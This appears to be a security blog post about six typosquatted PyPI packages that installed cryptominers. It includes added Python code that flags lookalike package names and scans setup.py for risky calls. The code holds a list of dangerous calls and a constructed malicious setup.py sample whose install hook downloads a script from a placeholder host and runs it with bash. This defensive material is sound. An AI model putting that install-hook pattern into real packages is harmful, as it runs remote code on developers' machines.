Researchers have recently detected malicious packages in PyPI, a software code repository, that turn developers’ workstations into cryptomining machines.
What Transpired?
Each infected package might be used to launch a supply-chain attack, affecting a variety of projects via info stealers or cryptominers.
- Experts discovered six harmful packages in the PyPI repository: maratlib, maratlib1, matplatlib-plus, mllearnlib, mplatlib, and learninglib.
- All of the malicious packages were published by the same individual, with names chosen to fool developers into installing them, and the ruse worked.
- Despite being misspelled imitations of real Python project names, the packages had been downloaded around 5,000 times since April.
- The malicious code was embedded in setup.py, the build script that runs during installation.
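Two of the findings above translate directly into pre-install checks a team can run on a source distribution before `pip install` executes its setup.py: a name too close to a well-known project, and install-time code that spawns a shell or fetches a remote script. The example below is added here and is not code from the article or from eScan; the popular-package list, the similarity threshold, and the two sample setup.py files are constructed for illustration (the sample hook mirrors the download-and-run behaviour the article describes, with a placeholder URL).

```python
"""Added example: pre-install checks for a downloaded Python sdist.

check 1 - typosquat_candidates(): flags package names that are close to a
          well-known project name (e.g. 'mplatlib' vs 'matplotlib').
check 2 - scan_setup_py(): flags install-time behaviour in setup.py, such as
          a custom install command, a subprocess call or a remote fetch.
All lists, thresholds and samples are constructed assumptions, not article data.
"""
import ast
from typing import List, Tuple

# Constructed allowlist of well-known names an attacker might imitate.
POPULAR_PACKAGES = {"matplotlib", "scikit-learn", "numpy", "requests", "pandas"}

# Calls that have no business running at install time (assumed list).
RISKY_CALLS = {
    "subprocess.call", "subprocess.run", "subprocess.Popen", "subprocess.check_output",
    "os.system", "os.popen", "os.execv",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "exec", "eval", "__import__",
}
SETUPTOOLS_COMMANDS = {"install", "develop", "egg_info", "build_py"}


def normalize(name: str) -> str:
    """PyPI treats '-', '_' and '.' as equivalent; lowercase and drop them."""
    return "".join(ch for ch in name.lower() if ch not in "-_.")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance by classic dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str) -> List[str]:
    """Popular names within 40% of their length in edits (integer arithmetic).

    Exact matches are the real package and are not reported.
    """
    norm = normalize(name)
    hits = []
    for popular in sorted(POPULAR_PACKAGES):
        dist = edit_distance(norm, normalize(popular))
        longest = max(len(norm), len(normalize(popular)))
        if 0 < dist and dist * 5 <= 2 * longest:   # dist / longest <= 0.4
            hits.append(popular)
    return hits


def _dotted_name(node: ast.AST):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str) -> List[str]:
    """Static scan of setup.py source; returns findings sorted by line."""
    found: List[Tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                found.append((node.lineno, f"install-time call to {name}()"))
            elif name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                found.append((node.lineno, "setup() overrides cmdclass (custom install hook)"))
        elif isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _dotted_name(base) in SETUPTOOLS_COMMANDS:
                    found.append((node.lineno, f"class {node.name} subclasses setuptools command {_dotted_name(base)}"))
    return [f"line {ln}: {msg}" for ln, msg in sorted(found)]


# Constructed sample: an install hook that fetches and runs a script (placeholder URL).
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
import subprocess
import urllib.request


class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("http://example.invalid/script.sh", "/tmp/script.sh")
        subprocess.call(["bash", "/tmp/script.sh"])


setup(name="mplatlib", version="0.1", cmdclass={"install": PostInstall})
"""

# Constructed sample: a benign setup.py with no install-time logic.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="mytool", version="1.0")\n'


if __name__ == "__main__":
    for pkg in ["maratlib", "matplatlib-plus", "mplatlib", "learninglib"]:
        print(pkg, "->", typosquat_candidates(pkg) or "no close popular name")
    for line in scan_setup_py(SAMPLE_SETUP_PY):
        print(line)
```

The name check is deliberately tolerant of several edits, because the package names in this incident differ from `matplotlib` by three or four characters, not one; tune the ratio against your own allowlist to keep false positives down. The setup.py scan is static and only catches the obvious shapes (subprocess, remote fetch, `cmdclass` overrides), so treat it as a triage step before installing into a sandbox, not as proof a package is clean.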
Devil is in the details
Threat actors are constantly attacking open-source code repositories like PyPI, GitHub, and RubyGems in order to mine cryptocurrencies.
- While investigating, researchers found that the packages attempted to download a Bash script (aza2.sh) from a GitHub repository that was no longer available.
- The script was found to launch the Ubqminer cryptominer on the compromised machines.
- In a later variant, the script instead deployed the open-source T-Rex mining application, which uses GPU capabilities.
Cryptocurrency is a lucrative target.
An onslaught of attacks is currently being launched against bitcoin platforms and their users.
- Threat actors have been seen sending fraudulent replacement devices to Ledger clients in order to steal cryptocurrency from their wallets. In a December data breach, the personal information of 272,853 people who bought a Ledger device was exposed.
- Cryptojacking is one of the most prevalent discussion topics among hackers in cybercriminal forums, according to studies.
- Furthermore, according to a survey, Australians paid almost $2 million in Bitcoin and other cryptocurrencies to cybercriminals last year.
- During the first quarter of 2020, cryptomining attacks increased fourfold as the price of Bitcoin skyrocketed.
Cryptojacking operations are a symptom of security weaknesses on the business side, while malware-laced software repositories are a popular vehicle for supply-chain attacks. Degraded system performance, overheating processors, and increased electricity consumption should all be on security teams’ radars. Developers and maintainers of software repositories are strongly encouraged to respond actively.
To read more, please check the eScan Blog.